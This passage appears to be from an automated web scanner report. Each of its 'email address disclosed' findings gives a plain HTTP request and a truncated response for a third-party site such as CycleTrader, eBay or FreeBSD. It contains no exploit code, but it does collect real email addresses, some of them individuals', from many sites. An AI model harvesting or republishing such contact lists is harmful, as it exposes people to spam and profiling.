  • advertising@cycletrader.com

Request

GET /research/resources/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:52 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 33542


<!-- dstolweb11-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Motorcycle Resources: Finance Insurance and More - CycleTrader.com</title>
   <meta name=
...[SNIP]...
<a href="mailto:advertising@cycletrader.com">advertising@cycletrader.com</a>
...[SNIP]...

24.167. http://www.cycletrader.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cycletrader.com
Path:   /sell/

Issue detail

The following email address was disclosed in the response:
  • customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:47 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29864


<!-- dstolweb07-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Motorcycle - CycleTrader.com</title>
   <meta name="description" co
...[SNIP]...
<a href="mailto:customerservice@cycletrader.com">customerservice@cycletrader.com</a>
...[SNIP]...

24.168. http://www.dedipower.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dedipower.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:
  • info@dedipower.com
  • sales@dedipower.com.hk

Request

GET / HTTP/1.1
Host: www.dedipower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Set-Cookie: symfony=6hvnhit5lq2d9qcjo8guti4nu0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a href="mailto:info@dedipower.com">info@dedipower.com</a>
...[SNIP]...
<a href="mailto:sales@dedipower.com.hk">sales@dedipower.com.hk</a>
...[SNIP]...

24.169. http://www.dinoex.de/unix-connect.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dinoex.de
Path:   /unix-connect.html

Issue detail

The following email addresses were disclosed in the response:
  • unix-connect-users@lists.sourceforge.net
  • unix-connect@mailinglisten.im-netz.de

Request

GET /unix-connect.html HTTP/1.1
Host: www.dinoex.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
ETag: "484445699"
Last-Modified: Fri, 06 Mar 2009 12:01:05 GMT
Content-Length: 3634
Connection: close
Date: Mon, 24 Jan 2011 16:04:51 GMT
Server: lighttpd/1.4.28

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="generator" content="HTML Tidy, see www.w3.org">
<meta http-equiv="Conte
...[SNIP]...
onnect-Support, auf der Hilfestellungen gegeben, Fehler
gemeldet, Patches verschickt, neue Versionen angek.ndigt und die weitere Programmentwicklung besprochen werden.
Die Adresse der Mailingliste ist unix-connect@mailinglisten.im-netz.de, f.r An- und Abmeldungen schreiben Sie
bitte an <a href=
"mailto:unix-connect-users@lists.sourceforge.net">unix-connect-users@lists.sourceforge.net</a>
...[SNIP]...

24.170. http://www.directstartv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directstartv.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • comments@DirectStarTV.com

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=0vked70odhg1a3p6bv8i242j10; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Mon, 23-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Sun, 24-Jan-2010 16:05:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148575341; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160872488; expires=Tue, 24-Jan-2012 16:05:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Fri, 25-Mar-2011 16:05:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<meta http-equiv="reply-to" content="comments@DirectStarTV.com" />
...[SNIP]...

24.171. http://www.dominionenterprises.com/main/do/Privacy_Policy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /main/do/Privacy_Policy

Issue detail

The following email address was disclosed in the response:
  • IPadministrator@dominionenterprises.com

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:02:50 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=bb05b7f7a9c540a99a25d950dbe037b3; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:02:50 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com">IPadministrator@dominionenterprises.com</a>
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com">IPadministrator@dominionenterprises.com</a>
...[SNIP]...

24.172. http://www.dominionenterprises.com/main/do/Terms_of_Use

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /main/do/Terms_of_Use

Issue detail

The following email address was disclosed in the response:
  • IPadministrator@dominionenterprises.com

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:02:50 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=eeae8ce201e707a408052831b7f8c270; expires=Thu, 27 Jan 2011 14:02:50 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 14:02:50 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=b9a249217f4497bd6bb8b0395db307ebc6392f532a5a5c034d3eced29c5eca85d241baed; Path=/
Content-Length: 45884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Terms of Use</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-eq
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com"><strong>IPadministrator@dominionenterprises.com</strong>
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com"><strong>IPadministrator@dominionenterprises.com</strong>
...[SNIP]...

24.173. http://www.ebayinc.com/content/press_release/ebay_selects_joomla_open_source_to_foste

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebayinc.com
Path:   /content/press_release/ebay_selects_joomla_open_source_to_foste

Issue detail

The following email addresses were disclosed in the response:
  • acoffee@ebay.com
  • press@ebay.com

Request

GET /content/press_release/ebay_selects_joomla_open_source_to_foste HTTP/1.1
Host: www.ebayinc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:24 GMT
Set-Cookie: JSESSIONID=56B7E2F4F643F8C3234B643523676F33; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Length: 19418


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<a href="mailto:press@ebay.com">press@ebay.com</a>
...[SNIP]...
<a href="mailto:acoffee@ebay.com">acoffee@ebay.com</a>
...[SNIP]...

24.174. http://www.employmentguide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employmentguide.com
Path:   /

Issue detail

The following email address was disclosed in the response:
  • custserv@traderonline.com

Request

GET / HTTP/1.1
Host: www.employmentguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 23:59:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
Content-type: text/html
Page-Completion-Status: Normal
Expires: 01/24/11
Pragma: no-cache
cache-control: no-cache
Page-Completion-Status: Normal
Set-Cookie: L=Dallas%2C+TX; path=/;
Set-Cookie: SITEMODE=desktop; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.employmentguide.com;
Set-Cookie: BIGipServeremploymentguide_pool=889387786.20480.0000; expires=Tue, 25-Jan-2011 01:59:20 GMT; path=/


                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<meta name="Reply-To" content="custserv@traderonline.com" />
...[SNIP]...

24.175. http://www.equipmenttraderonline.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equipmenttraderonline.com
Path:   /research/resources/

Issue detail

The following email address was disclosed in the response:
  • sales@equipmenttraderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:48:20 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27279


<!-- dstolwebvm01-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Equipment Resources: Equipment loans, attachments, trailers, painting, transport, and
...[SNIP]...
<a href="mailto:sales@equipmenttraderonline.com" title="Send email to our sales team">sales@equipmenttraderonline.com</a>
...[SNIP]...

24.176. http://www.equipmenttraderonline.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equipmenttraderonline.com
Path:   /sell/

Issue detail

The following email addresses were disclosed in the response:
  • customerservice@equipmenttraderonline.com
  • webmaster@equipmenttraderonline.com

Request

GET /sell/ HTTP/1.1
Host: www.equipmenttraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:22 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 25721


<!-- dstolweb06-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell your new or used equipment - EquipmentTraderOnline.com</title>
   <meta name="descri
...[SNIP]...
<a href="mailto:customerservice@equipmenttraderonline.com" title="Email customer service">customerservice@equipmenttraderonline.com</a> or <a href="mailto:webmaster@equipmenttraderonline.com" title="Email the site administrator">webmaster@equipmenttraderonline.com</a>
...[SNIP]...

24.177. http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eraser.ee
Path:   /uudised/joomla/329-joomla-16-on-saabunud.html

Issue detail

The following email address was disclosed in the response:
  • eraser@eraser.ee

Request

GET /uudised/joomla/329-joomla-16-on-saabunud.html HTTP/1.1
Host: www.eraser.ee
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2fa25d95fd31dc38873e1bc08d1d659=da81efe2eb9fa0e02e77a8fa6697e953; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-presets=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-backgroundlevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-bodylevel=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-cssstyle=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-linkcolor=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-family=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Set-Cookie: gantry-31205e6f7fffc90515cc576783f2f86e-font-size-is=deleted; expires=Sun, 24-Jan-2010 16:04:55 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="et-ee" lang="et-ee" >
<he
...[SNIP]...
<a target="_blank" title="Eraser @ MSN" mce_href="http://mce_host/msnim:add?contact=eraser@eraser.ee" href="http://mce_host/msnim:add?contact=eraser@eraser.ee">
...[SNIP]...

24.178. http://www.exit109.com/~jeremy/news/cleanfeed.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exit109.com
Path:   /~jeremy/news/cleanfeed.html

Issue detail

The following email address was disclosed in the response:
  • webmaster@exit109.com

Request

GET /~jeremy/news/cleanfeed.html HTTP/1.1
Host: www.exit109.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 24 Jan 2011 16:04:59 GMT
Server: Apache/1.3.37 (Unix) mod_jk/1.2.15 PHP/5.2.14 mod_ssl/2.8.28 OpenSSL/0.9.8c
Location: http://www.exit109.com/~jeremy/news/cleanfeed/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 365

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.exit109.com/~je
...[SNIP]...
<A HREF="mailto:webmaster@exit109.com">
...[SNIP]...

24.179. http://www.fiction.net/blong/programs/#aub/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiction.net
Path:   /blong/programs/#aub/x26amp

Issue detail

The following email addresses were disclosed in the response:
  • blong@fiction.net
  • fox@convex.hp.com
  • ley@rz.uni-karlsruhe.de
  • wfp5p@virginia.edu

Request

GET /blong/programs/#aub/x26amp HTTP/1.1
Host: www.fiction.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:05:12 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14165

<HTML>
<HEAD>
<TITLE>Brandon's Program Archive</TITLE>
</HEAD>
<BODY BGCOLOR=#ffffff>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javas
...[SNIP]...
<a href="mailto:blong@fiction.net">blong@fiction.net</a>
...[SNIP]...
</A>
This program was written by Andreas Ley (ley@rz.uni-karlsruhe.de). It converts
any GIF to a GIF89a and allows for setting the transparent and background color,
changing colors, adding or removing comments, and anaylyzing GIF contents.
A must for the Un*x based Web
...[SNIP]...
</A>
XBuffy was written by Bill Pemberton (wfp5p@virginia.edu) and was
based on Xmultibiff. It allows the user to specify multiple mail folders
which XBuffy will watch for incoming mail. The first patch below is
by David DeSimone (fox@convex.hp.com) and
fixes a couple of bugs and makes sure that XBuffy doesn't change the
mtime and atime of the folder so that XBuffy doesn't interfere with
other programs which check for new mail, such as the mailb
...[SNIP]...
<a href="mailto:blong@fiction.net">blong@fiction.net</a>
...[SNIP]...

24.180. http://www.foxaudiencenetwork.com/aboutus_contactus.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxaudiencenetwork.com
Path:   /aboutus_contactus.php

Issue detail

The following email address was disclosed in the response:
  • name@domain.com

Request

GET /aboutus_contactus.php HTTP/1.1
Host: www.foxaudiencenetwork.com
Proxy-Connection: keep-alive
Referer: http://www.foxaudiencenetwork.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=fan-foxaudience%3D%2526pid%253DFAN%25253AHomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.foxaudiencenetwork.com/aboutus_contactus.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
[a-zA-Z]{2,3}$/;
   if (emailad != "")
   {
       if(((emailad.search(exclude) != -1) || (emailad.search(check)) == -1) || (emailad.search(checkend) == -1)) {
           alert("Please enter a valid email address (name@domain.com)");
           document.theForm.email.value="";
           document.theForm.email.focus();
           return false;
       }
   }
   return true;
}

// -->
...[SNIP]...

24.181. http://www.freebsd.org/about.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /about.html

Issue detail

The following email address was disclosed in the response:
  • board@FreeBSDFoundation.org

Request

GET /about.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2544596647"
Last-Modified: Fri, 31 Dec 2010 18:24:30 GMT
Content-Length: 9564
Connection: close
Date: Mon, 24 Jan 2011 16:19:40 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a
href="mailto:board@FreeBSDFoundation.org">board@FreeBSDFoundation.org</a>
...[SNIP]...

24.182. http://www.freebsd.org/cgi/cvsweb.cgi/ports/chinese/pine4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/chinese/pine4

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/chinese/pine4 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/chinese/pine4/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.183. http://www.freebsd.org/cgi/cvsweb.cgi/ports/chinese/tin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/chinese/tin

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/chinese/tin HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/chinese/tin/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.184. http://www.freebsd.org/cgi/cvsweb.cgi/ports/converters/mpack

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/converters/mpack

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/converters/mpack HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/converters/mpack/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.185. http://www.freebsd.org/cgi/cvsweb.cgi/ports/deskutils/kdepim3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/deskutils/kdepim3

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/deskutils/kdepim3 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/deskutils/kdepim3/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:02 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7108

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.186. http://www.freebsd.org/cgi/cvsweb.cgi/ports/german/unix-connect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/german/unix-connect

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/german/unix-connect HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/german/unix-connect/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:35 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.187. http://www.freebsd.org/cgi/cvsweb.cgi/ports/japanese/slrn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/japanese/slrn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/japanese/slrn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/japanese/slrn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:43 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.188. http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/adcomplain

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/mail/adcomplain

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/mail/adcomplain HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/mail/adcomplain/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
